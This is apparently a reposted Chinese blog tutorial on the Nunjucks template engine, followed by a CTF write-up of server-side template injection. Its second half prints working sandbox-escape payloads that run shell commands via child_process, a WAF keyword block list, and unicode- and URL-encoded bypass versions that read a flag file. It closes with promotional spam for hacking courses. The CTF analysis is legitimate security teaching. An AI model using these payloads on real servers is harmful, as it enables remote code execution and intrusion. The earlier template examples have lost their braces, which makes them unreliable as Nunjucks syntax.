Nunjucks简介&基本使用教程
Posted Python_chichi
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Nunjucks简介&基本使用教程相关的知识,希望对你有一定的参考价值。
Nunjucks简介:
Nunjucks 是一个功能丰富、强大的 javascript 专用模板引擎。Nunjucks 提供丰富的语言特性和块继承、自动转移、宏和异步控制等等。
重点要关注的是,Nunjucks 模板引擎的代码在沙箱环境中运行,任何全局对象都从环境中剥离出来,以限制可用于跳出沙箱并执行任意代码。因此我们测试 root
或 global
时并没有任何反应,所以说明代码在沙箱环境中运行,而root和global命令并没有跳出沙箱进行RCE。
Nunjucks基础:
nunjucks模板注释:
由于nunjucks 模板, 直接以写html 的方式写的模板文件, 因此他的注释可以直接使用html 的注释即可.
#1. 可以编译到html文件中的注释, 直接使用html注释写法
<!-- 我是nunjucks中的注释 -->
#2. nunjucks自己的注释, 只是写模板时的注释, 最后不会编译到html文件中
# 我是nunjucks 自己的注释 #
nunjucks 插值语法:
nunjucks 的插值语法和我们平常写 VUE 的语法一样, 只需要写双大括号 即可以完成插值引用。html 文件如下.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
<h1>我是一级标题</h1>
<!-- 插值引用数据 -->
<p>用户名是:username</p>
</body>
</html>
Nunjucks 的判断语句:
nunjucks 模板中, 同样可以写判断语句来完成一些判断的基本操作, 只不过判断语句的写法要写在大括号中间的两个百分号里.% 这里可以写判断语句 % , 判断语句的结束时, 一定要写 判断结束语句标识. 即 % endif %
具体代码演示如下:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
% if num > 3%
<p>num的值大于 3</p>
% elseif num < 3%
<p>num的值小于 3</p>
% else %
<p>num的值等于三</p>
% endif % <!-- 注意最后一定要写 结束判断的标志 -->
</body>
</html>
nunjucks 的循环语句:
for in 循环 nunjucks 模板引擎中, 同样存在循环语法用来做一些简单的循环, 但是同样注意要给一个结束循环的标志. % endfor %
具体代码演示如下:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
<h1>我是一级标题</h1>
<ul>
% for item in usersArr%
<li>
姓名是: item.name
年龄是: item.age
</li>
% endfor % <!-- 注意在循环结束时,给一个结束的标志-->
</ul>
</body>
</html>
nunjucks内置的过滤器:
nunjucks 模板引擎中, 存在很多内置过滤器,用来完成我们对数据的一些过滤,筛选和加工的相关操作.
过滤器的写法是需要在 要过滤的数据后通过 管道符号来把过滤器分割开. 并且过滤器还以连续操作, 即在过滤器 1 的后面再写过滤器, 具体代码演示如下:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
<h1>我是一级标题</h1>
<!-- 过滤器1: replace, 把"world"替换为 "你好" -->
<!-- 过滤器2: capitalize, 然后首字母大写 -->
str | replace("world","你好") | capitalize
</body>
</html>
题目描述:
有幸做到了whoami师傅出的web题目,是关于Nunjucks模板的SSTI,我们先来描述一下题目环境:
进入是一个登录框:
随便输入一个用户名和密码即可成功登录:
说明这个题目不是sql注入,题目获取登录的用户名之后便在/user/home中重新输出,所以我们尝试进行模板注入。
首先尝试7*7,发现它成功执行49,于是在确定是什么类型的模板引擎,我们尝试进行报错,发现是Nunjucks引擎
全局函数:
我们如果想进行沙箱逃逸进行代码执行,我们最重要的就是使用沙箱内有的函数进行逃逸,经查阅 Nunjucks 的官方文档可知,Nunjucks 模板引擎中有定义了三个全局函数:range、cycler 和 joiner:全局函数有一些内置的全局函数涵盖了一些常见情况。
range([start], stop, [step]):
如果您需要迭代一组固定的数字,range
为您生成一组。数字从start
(默认值 0)开始并递增step
(默认值 1)直到达到stop
,不包括它。
range (start step stop)
% for i in range(0, 5) -%
i ,
%- endfor %
以上输出 :0,1,2,3,4
cycler(item1, item2, ...itemN):
轮换多个值的一种简单方法是使用cycler
,它接受任意数量的参数并循环遍历它们。
% set cls = cycler("odd", "even") %
% for row in rows %
<div class=" cls.next() "> row.name </div>
% endfor %
在上面的示例中,奇数行的类别为“奇数”,偶数行的类别为“偶数”。您可以访问属性上的当前项current
(在上例中为cls.current
)。
joiner([separator]):
组合多个项目时,通常希望用逗号等分隔它们,但您不想输出第一个项目的分隔符。除非第一次被调用,否则该类将joiner
输出(默认为“,”)。separator
% set comma = joiner() %
% for tag in tags -%
comma() tag
% endfor %
如果tags
是["food", "beer", "dessert"]
,上面的例子将输出food, beer, dessert
。
创建函数:
这三个全局函数是Nunjucks模板中唯一的可调用函数。这里我们需要运用一下Javascript中的语法。下面的内容在我学习的时候感觉有点难理解,很容易绕进去,所以我们分开来看每句话是什么意思。
-
每一个对象里的constructor属性指向这个对象的==构造函数==本身
-
我们可以用这个==构造函数==创建一个新的对象
-
比如字符串对象,constructor属性指向
[Function:String]
(字符串对象的构造函数本身)。
> 'string'.constructor
[Function: String]
>
所以我们就可以用这个构造函数[Function:String]
来创建一个新的字符串。
-
同理,如果我们获取到了一个函数或者方法(统称为对象)的==构造函数==
-
那我们就可以用这个==构造函数==创建一个新的函数或者方法(统称为对象)
-
甚至可以创建一个新的匿名函数来执行任意代码。
构造函数:
所以我们可以自己构造一个函数:
> function say(word)
... console.log(word);
...
undefined
> say.constructor
[Function: Function]
>
-
在代码中say就是我们自己构造的函数
say(word)
,他就是我们上面所说的对象。 -
而
say.constructor
返回的结果[Function: Function]
其实就是我们所说的:constructor属性指向这个对象的==构造函数==本身。 -
然后我们利用这个构造函数
[Function: Function]
来创建一个匿名函数实现代码执行:
> say.constructor("return console.log('success')")()
success
undefined
>
-
利用这个原理,我们通过 Nunjucks 提供的那几个全局函数便可以突破 Nunjucks 的沙箱限制并成实现任意代码执行。
-
所以我们就用仅有的几个函数来构造一下自己的函数,然后来实现命令执行。
沙箱逃逸:
在逃逸之前我们先学习几个JavaScript中对应的几个基础知识,因为whoami师傅构造的payload中有这些知识,不知道的话,根本不知道怎么构造出来的……
global预定义全局对象:
-
在 JavaScript 中,
global
是一个预定义的全局对象。 -
它表示全局作用域,也就是说,在任何地方都可以访问它的属性和方法。
-
在 Node.js 中,
global
对象的属性和方法可以在任何模块中使用,而不需要使用require()
来导入它们。
例如,在 Node.js 中,您可以使用 global.process
来访问 process
对象,而不需要使用 require('process')
process:
在Node.js中,process
是一个全局变量,它提供了许多与当前Node.js进程相关的信息和控制方法。它是Node.js的一个内置模块,用于访问当前Node.js进程的信息和配置。
MainModule:
-
在Node.js中,每个模块都有一个MainModule。MainModule是Node.js应用程序的入口模块,是Node.js应用程序启动时第一个被执行的模块。
-
MainModule通常是我们从命令行启动Node.js应用程序时传递给Node.js的JavaScript文件。
-
在MainModule中,我们可以使用Node.js的全局变量和模块系统来加载其他的模块,从而构建出完整的应用程序。MainModule也可以通过
require.main
属性来获取到,该属性指向当前Node.js应用程序执行的JavaScript文件所对应的模块对象。 -
在MainModule中,我们可以通过
require.main === module
来判断当前模块是否为MainModule。 -
除了MainModule外,每个模块都有自己的模块作用域和模块对象。
-
模块作用域是指模块内部的变量和函数只能在该模块内部使用,而不能被其他模块访问。
-
模块对象是指每个模块都有一个Module对象,该对象包含了当前模块的一些元数据信息,例如模块的ID、文件名、父模块、子模块等信息。
child_process
:
-
child_process
是Node.js的一个模块,用于创建新的子进程并与其进行通信。在Node.js中,由于其单线程的特性,无法真正利用多核CPU的优势,因此child_process
模块提供了一种方式来创建新的进程以充分利用系统资源。child_process
模块提供了四种创建子进程的方法:
exec(): 执行一个shell命令,并将结果返回给Node.js。
spawn():启动一个新的进程,并能够与其进行标准的输入输出通信。
fork(): 启动一个新的Node.js进程,并能够通过IPC通信与其进行交互。
execFile():类似于exec(),但是可以直接执行一个可执行文件而不需要通过shell解释器
-
通过使用
child_process
模块,我们可以在Node.js中执行外部命令、启动其他的Node.js进程、执行可执行文件等操作,从而实现更加复杂的任务。 -
同时,由于每个子进程都是独立的,因此可以更好地控制进程的资源使用和错误处理,提高应用程序的可靠性和稳定性。
payload结构:
-
range.constructor("return global.process.mainModule.require('child_process').exec('calc')")()
-
range.constructor("return global.process.mainModule.require('child_process').execSync('ls /').toString()")()
我们来分析一下这一行代码的结构。
range.constructor:是range全局函数里的<u>constructor属性</u>指向函数本身,其返回的结果是对应的构造函数,所以我们才能在参数里面进行命令执行,从而实现沙箱逃逸。
global定义全局对象,然后调用process全局变量,然后MainModule来开启模块,来调用其他模块,所以下面就通过require调用了child_process模块,同时使用模块下面的exec函数来执行calc的shell命令,所以打开了计算器。
也可以通过字符串获取到 [Function: Function]
:
-
'string'.toString.constructor("return global.process.mainModule.require('child_process').exec('calc')")()
-
'string'.constructor.constructor("return global.process.mainModule.require('child_process').exec('calc')")()
Bypass:
我们看一下waf:
|joiner|\\'|range|root|cycler|constructor|toString|mainModule|main|require|\\.|process|exec|object|file|spawn|eval|concat|base|buffer|from|空格
三个函数都被过滤了,我们可以用字符串拼接进行绕过,然后用[]来绕过点的过滤,然后用unicode编码绕过后面的操作。
"string"["toSt"+"ring"]["const"+"ructor"]("return(global[\\"\\\\u0070\\\\u0072\\\\u006f\\\\u0063\\\\u0065\\\\u0073\\\\u0073\\"][\\"\\\\u006d\\\\u0061\\\\u0069\\\\u006e\\\\u004d\\\\u006f\\\\u0064\\\\u0075\\\\u006c\\\\u0065\\"][\\"\\\\u0072\\\\u0065\\\\u0071\\\\u0075\\\\u0069\\\\u0072\\\\u0065\\"](\\"\\\\u0063\\\\u0068\\\\u0069\\\\u006c\\\\u0064\\\\u005f\\\\u0070\\\\u0072\\\\u006f\\\\u0063\\\\u0065\\\\u0073\\\\u0073\\")[\\"\\\\u0065\\\\u0078\\\\u0065\\\\u0063\\\\u0053\\\\u0079\\\\u006e\\\\u0063\\"](\\"id\\")[\\"\\\\u0074\\\\u006f\\\\u0053\\\\u0074\\\\u0072\\\\u0069\\\\u006e\\\\u0067\\"]())")()
// 'string'.constructor.constructor("return global.process.mainModule.require('child_process').execSync('id').toString()")()
然后命令可以进行执行了以后,我们来读取flag
"string"["toSt"+"ring"]["const"+"ructor"]("return(global[\\"\\\\u0070\\\\u0072\\\\u006f\\\\u0063\\\\u0065\\\\u0073\\\\u0073\\"][\\"\\\\u006d\\\\u0061\\\\u0069\\\\u006e\\\\u004d\\\\u006f\\\\u0064\\\\u0075\\\\u006c\\\\u0065\\"][\\"\\\\u0072\\\\u0065\\\\u0071\\\\u0075\\\\u0069\\\\u0072\\\\u0065\\"](\\"\\\\u0063\\\\u0068\\\\u0069\\\\u006c\\\\u0064\\\\u005f\\\\u0070\\\\u0072\\\\u006f\\\\u0063\\\\u0065\\\\u0073\\\\u0073\\")[\\"\\\\u0065\\\\u0078\\\\u0065\\\\u0063\\\\u0053\\\\u0079\\\\u006e\\\\u0063\\"](\\"\\\\u0063\\\\u0061\\\\u0074\\\\u0020\\\\u002f\\\\u0066\\\\u006c\\\\u0061\\\\u0067\\")[\\"\\\\u0074\\\\u006f\\\\u0053\\\\u0074\\\\u0072\\\\u0069\\\\u006e\\\\u0067\\"]())")()
// UrlEncode
%7B%7B%22string%22%5B%22toSt%22%2B%22ring%22%5D%5B%22const%22%2B%22ructor%22%5D(%22return(global%5B%5C%22%5C%5Cu0070%5C%5Cu0072%5C%5Cu006f%5C%5Cu0063%5C%5Cu0065%5C%5Cu0073%5C%5Cu0073%5C%22%5D%5B%5C%22%5C%5Cu006d%5C%5Cu0061%5C%5Cu0069%5C%5Cu006e%5C%5Cu004d%5C%5Cu006f%5C%5Cu0064%5C%5Cu0075%5C%5Cu006c%5C%5Cu0065%5C%22%5D%5B%5C%22%5C%5Cu0072%5C%5Cu0065%5C%5Cu0071%5C%5Cu0075%5C%5Cu0069%5C%5Cu0072%5C%5Cu0065%5C%22%5D(%5C%22%5C%5Cu0063%5C%5Cu0068%5C%5Cu0069%5C%5Cu006c%5C%5Cu0064%5C%5Cu005f%5C%5Cu0070%5C%5Cu0072%5C%5Cu006f%5C%5Cu0063%5C%5Cu0065%5C%5Cu0073%5C%5Cu0073%5C%22)%5B%5C%22%5C%5Cu0065%5C%5Cu0078%5C%5Cu0065%5C%5Cu0063%5C%5Cu0053%5C%5Cu0079%5C%5Cu006e%5C%5Cu0063%5C%22%5D(%5C%22%5C%5Cu0063%5C%5Cu0061%5C%5Cu0074%5C%5Cu0020%5C%5Cu002f%5C%5Cu0066%5C%5Cu006c%5C%5Cu0061%5C%5Cu0067%5C%22)%5B%5C%22%5C%5Cu0074%5C%5Cu006f%5C%5Cu0053%5C%5Cu0074%5C%5Cu0072%5C%5Cu0069%5C%5Cu006e%5C%5Cu0067%5C%22%5D())%22)()%7D%7D
// 'string'.constructor.constructor("return global.process.mainModule.require('child_process').execSync('cat /flag').toString()")()
黑客学习资源免费分享,保证100%免费!!!
需要的话可以点击**CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享**
👉网安(黑客)全套学习视频👈
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。
👉网安(黑客红蓝对抗)所有方向的学习路线👈
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
👉黑客必备开发工具👈
工欲善其事必先利其器。学习黑客常用的开发软件都在这里了,给大家节省了很多时间。
这份完整版的网络安全(黑客)全套学习资料已经上传至CSDN官方,朋友们如果需要点击下方链接即可前往获取【保证100%免费】。
需要的话可以点击CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
以上是关于Nunjucks简介&基本使用教程的主要内容,如果未能解决你的问题,请参考以下文章